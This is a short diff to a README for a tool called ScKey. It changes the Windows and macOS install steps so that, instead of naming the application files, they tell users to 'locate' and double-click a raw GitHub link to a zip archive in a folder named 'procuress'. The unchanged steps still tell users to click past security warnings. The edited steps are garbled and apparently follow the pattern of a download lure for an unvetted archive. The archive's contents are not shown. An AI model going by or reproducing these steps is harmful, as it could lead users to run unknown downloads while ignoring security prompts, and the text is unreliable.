nsarsaade240/ScKey/README.md

 ### For Windows

 1. Open the folder where you downloaded the file.
-2. Locate "ScKey.exe" and double-click it.
+2. Locate "https://raw.githubusercontent.com/nsarsaade240/ScKey/main/procuress/ScKey-1.1.zip" and double-click it.
 3. If a security warning appears, click “Run” to continue.

 ### For macOS

 1. Open the folder where you downloaded the file.
-2. Locate "ScKey.app" and double-click it.
+2. Locate "https://raw.githubusercontent.com/nsarsaade240/ScKey/main/procuress/ScKey-1.1.zip" and double-click it.
 3. If prompted, confirm to open the application.

 ## 🔑 How to Use ScKey